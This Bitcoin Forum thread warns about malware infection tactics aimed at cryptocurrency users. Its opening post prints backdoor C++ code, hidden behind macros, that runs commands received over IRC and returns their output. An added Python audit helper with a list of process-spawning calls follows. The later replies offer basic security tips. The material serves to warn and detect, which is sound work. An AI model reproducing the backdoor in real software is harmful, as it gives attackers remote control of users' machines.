Bitcoin Forum
Author Topic: Beware of Increasingly Sophisticated Malware Infection Attempts  (Read 694839 times)
Miha Kot
Newbie
June 30, 2018, 11:50:41 AM
 #721

In the past months, malware infection attempts on this forum have become increasingly sophisticated. Below is a summary of infection techniques that I have encountered. With the most sophisticated attacks, common sense and virus scans are no longer sufficient to ensure safety.

"latest wallet"/"custom wallet"/"faster miner"
A newbie asks for the latest wallet, or a wallet that doesn't have any tx fees, or the latest/fastest miner, and the attacker posts his in response. This type of attempt usually gets spotted pretty quickly.

Copied/new ANN
The attacker creates a new ANN topic and posts a malware link as the wallet (or a legit one and changes it to a malware one later).

Replacing links in quotes
The attacker quotes a legitimate post containing a download link written by the real developer (usually the OP or an update post) and changes the link within the quote to a malware link.

Compromised dev account
The developer account (usually responsible for making the OP) is compromised and a "mandatory update" is posted. This usually happens with old/abandoned coins so the real developer isn't there to notice the rogue update.

Packed/FUD executables
In most of the cases above, the malware has little to no detections on VirusTotal. This is because any script kiddie can pay $30 and have their malware crypted, rendering it fully undetectable.

Modified source with backdoor
This was recently brought to my attention via a user report. A newbie, under the guise of reviving a coin, posted a new client along with source. However, the source was modified to include a backdoor in the IRC bootstrapping mechanism.
Here is the relevant source code:
Code:
if (vWords[1] == CBuff && vWords[3] == ":!" && vWords[0].size() > 1)
{
    CLine *buf = CRead(strstr(strLine.c_str(), vWords[4].c_str()), "r");
    if (buf) {
        std::string result = "";
        while (!feof(buf))
            if (fgets(pszName, sizeof(pszName), buf) != NULL)
                result += pszName;
        CFree(buf);
        strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
        if (strchr(pszName, '!'))
            *strchr(pszName, '!') = '\0';
        Send(hSocket, strprintf("%s %s :%s\r", CBuff, pszName, result.c_str()).c_str());
    }
}
Here is the source code with macros resolved:
Code:
if (vWords[1] == "PRIVMSG" && vWords[3] == ":!" && vWords[0].size() > 1)
{
    FILE *buf = popen(strstr(strLine.c_str(), vWords[4].c_str()), "r");
    if (buf) {
        std::string result = "";
        while (!feof(buf))
            if (fgets(pszName, sizeof(pszName), buf) != NULL)
                result += pszName;
        pclose(buf);
        strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
        if (strchr(pszName, '!'))
            *strchr(pszName, '!') = '\0';
        Send(hSocket, strprintf("%s %s :%s\r", "PRIVMSG", pszName, result.c_str()).c_str());
    }
}
The code was part of the initial commit, so it would be difficult to notice the addition of the code by casual inspection. Also, this would likely not show up on any virus scans.

What security system should one use to avoid falling into the trap of cybercriminals, and how can one understand that it is cybercriminals?
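
An added example, not part of the original post or of the coin's source: a small Python audit helper that resolves simple `#define` aliases across a source tree and reports call sites that end up at a process-spawning function, which is how `CRead` hid `popen` in the listing above. The `#define` lines, the file names and the `SINKS` list are assumptions made for this sample.

```python
import re

# Calls that start a process or shell; any alias of one deserves a manual look.
SINKS = {"popen", "_popen", "system", "execl", "execlp", "execv", "execvp",
         "CreateProcessA", "CreateProcessW", "ShellExecuteA", "WinExec"}
# Object-like macro with a single-token body, e.g. "#define CRead popen".
DEFINE = re.compile(r'^[ \t]*#[ \t]*define[ \t]+([A-Za-z_]\w*)[ \t]+(\S.*?)[ \t]*$', re.M)
CALL = re.compile(r'([A-Za-z_]\w*)\s*\(')
# Comments and string/char literals are blanked (newlines kept) so they never match.
NOISE = re.compile(r'//[^\n]*|/\*.*?\*/|"(?:\\.|[^"\\\n])*"|\'(?:\\.|[^\'\\\n])*\'', re.S)

def strip_noise(src):
    return NOISE.sub(lambda m: re.sub(r'[^\n]', ' ', m.group()), src)

def resolve(name, macros):
    """Follow alias chains (A -> B -> popen); stop on a cycle."""
    seen = set()
    while name in macros and name not in seen:
        seen.add(name)
        name = macros[name]
    return name

def audit(files):
    """files: {path: source}. Returns [(path, line, name_as_written, real_name)]."""
    clean = {path: strip_noise(src) for path, src in files.items()}
    macros = {}
    for src in clean.values():  # the macro may be defined in another file
        for alias, body in DEFINE.findall(src):
            if re.fullmatch(r'[A-Za-z_]\w*', body):
                macros[alias] = body
    hits = []
    for path, src in clean.items():
        for lineno, line in enumerate(src.splitlines(), 1):
            for m in CALL.finditer(line):
                real = resolve(m.group(1), macros)
                if real in SINKS:
                    hits.append((path, lineno, m.group(1), real))
    return hits

# Constructed sample: macro names are from the post; #define lines and file names are assumed.
SAMPLE = {
    "compat.h": '#define CBuff "PRIVMSG"\n#define CLine FILE\n'
                '#define CRead popen\n#define CFree pclose\n',
    "irc.cpp": '// reply handler, no system() call here\n'
               '    CLine *buf = CRead(strstr(strLine.c_str(), vWords[4].c_str()), "r");\n',
}

if __name__ == "__main__":
    print(audit(SAMPLE))
```

Only single-token aliases are followed; a function-like macro is still reported at its `#define` line when its body calls a listed function directly.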
diego ramos
Newbie
June 30, 2018, 05:32:07 PM
 #722

Tell me, is it so that Mac OS is not protected from such attempts to harm? It seemed to me that Apple's products are quite protected.
dablatair
Member
July 04, 2018, 08:46:06 AM
 #723

I'm quite impressed by the power and imagination of hackers to find the weakness and exploit it everywhere!

Finally, you never know if you are 100% safe or not.

Just be careful as much as possible.
iSparta
Member
July 05, 2018, 07:05:33 PM
 #724

A year ago, my email was hacked. After that, the coins were withdrawn from the exchange. It cost about 3,5k$. 2FA had not been installed. Gmail mail return failed. Many contacts are missing.
It is better to have a special e-mail for the exchange with 2FA enabled and a special smartphone with the Google application. You don’t have to use this e-mail and smartphone for any other purposes.
cryptohorizons
Newbie
July 06, 2018, 06:22:49 AM
 #725

I've seen some ads on FB and Google that take you to a page that installs mining scripts too...
Ethan101
Newbie
July 06, 2018, 07:20:52 AM
 #726

Nowadays a lot of phishing and malware-infected hacking attempts are happening due to bad guys who want to steal your personal information, especially private keys. Blockchain technology is a good technology, but it still has a lot of problems that need to be addressed. I want every cryptocurrency wallet to have a double-factor authentication key that works with Google Authenticator.
Proba001
Newbie
July 06, 2018, 08:16:47 AM
 #727

Double authentication is the best thing you can think of!!!
I agree 100%.
fsn
Member
July 06, 2018, 10:19:42 AM
 #728

Always beware of increasingly sophisticated malware infection attempts and just believe.
edsnowangel
Member
July 08, 2018, 02:07:15 PM
 #729

Correct me if I'm wrong, but malware is generally for executables in Windows, no? I mean the wallets are, but is Kaspersky not enough?
If not, why do we need to protect from the case of retrieving passwords from the users and other stuff from even pen drives with wallets (including the common coins ones) like DOGE, LTC, BTC and a few more?

Yes, most malware are executable files in the Windows operating system, but this doesn't mean that malware can't affect other operating systems such as Mac and Linux distros. There are other malware and viruses that can also penetrate other OSes. The key is to make sure that we do not easily fall into the trap of these people who are taking advantage of newbies.
Birenda23
Newbie
July 08, 2018, 04:55:01 PM
 #730

I hope to have a healthy community and warn the coin to show signs of scam
meerkatoken
Copper Member
Jr. Member
July 08, 2018, 05:52:53 PM
 #731

Correct me if I'm wrong, but malware is generally for executables in Windows, no? I mean the wallets are, but is Kaspersky not enough?
If not, why do we need to protect from the case of retrieving passwords from the users and other stuff from even pen drives with wallets (including the common coins ones) like DOGE, LTC, BTC and a few more?

Yes, most malware are executable files in the Windows operating system, but this doesn't mean that malware can't affect other operating systems such as Mac and Linux distros. There are other malware and viruses that can also penetrate other OSes. The key is to make sure that we do not easily fall into the trap of these people who are taking advantage of newbies.

I believe the best you can do is to install the latest Malwarebytes. It is available for Win, Mac and Linux as well.
coincentrado
Jr. Member
July 08, 2018, 08:42:06 PM
 #732

Thanks for the warning!
userclix
Newbie
July 09, 2018, 06:14:31 AM
 #733

Thank you for identifying these issues and providing useful tips and solutions to avoid being scammed. The crypto currency sphere needs this type of vigilance to attract more users in the future. It is really helpful. Much appreciated!
cryptohelp2
Newbie
July 09, 2018, 06:46:34 AM
 #734

It's extremely important to be updated about security vulnerabilities these days.
Phuc1411
Newbie
July 09, 2018, 12:58:48 PM
 #735

Thanks, this was very informative. I guess this forum is a big target for malware developers who want to steal easy crypto money. This is very helpful. I am very carefree while on the net, but with this information I will be more cautious.
DeathCrash
Member
July 09, 2018, 06:37:09 PM
 #736

The software of hackers is improved every hour; with this you cannot argue. So as not to become a victim of a hacker, observe simple rules.
1. Update the antivirus in time
2. Enable auto-update of the system and all important programs (browsers, Java script, etc.)
3. Buy a good router
4. Or, as an option, use Linux for wallets
edsnowangel
Member
July 10, 2018, 12:45:23 AM
 #737

The software of hackers is improved every hour; with this you cannot argue. So as not to become a victim of a hacker, observe simple rules.
1. Update the antivirus in time
2. Enable auto-update of the system and all important programs (browsers, Java script, etc.)
3. Buy a good router
4. Or, as an option, use Linux for wallets

Great suggestion. A Linux wallet and Linux OS is great, but there are other attacks, like spoofing, that inject malware into the user's machine. To avoid getting hacked, I will add: make sure you are connected to secure DNS servers. This will also add a little security to your machine.
Pomualdo
Newbie
July 10, 2018, 04:25:44 PM
 #738

I thought that it should not bother me. But it turned out that my device is participating in mining, and I did not even suspect it. Be more careful.
NeelMariaWarner
Jr. Member
July 13, 2018, 03:14:48 PM
 #739

The software of hackers is improved every hour; with this you cannot argue. So as not to become a victim of a hacker, observe simple rules.
1. Update the antivirus in time
2. Enable auto-update of the system and all important programs (browsers, Java script, etc.)
3. Buy a good router
4. Or, as an option, use Linux for wallets

Good advice, sir, really useful for me myself because my computer was hacked a long time ago. So for now I can anticipate for the safety of my laptop. Thanks, sir.
Pojumek
Newbie
July 13, 2018, 03:29:40 PM
 #740

Remedy me if I'm wrong, yet malware is generally for executables in Windows, no? I mean the wallets are, nevertheless is Kaspersky not enough?

If not, for what reason do we have to shield from the instance of retrieving passwords from the clients and other stuff from even pen drives with wallets (counting the regular coins ones) like DOGE, LTC, BTC and a couple of something beyond?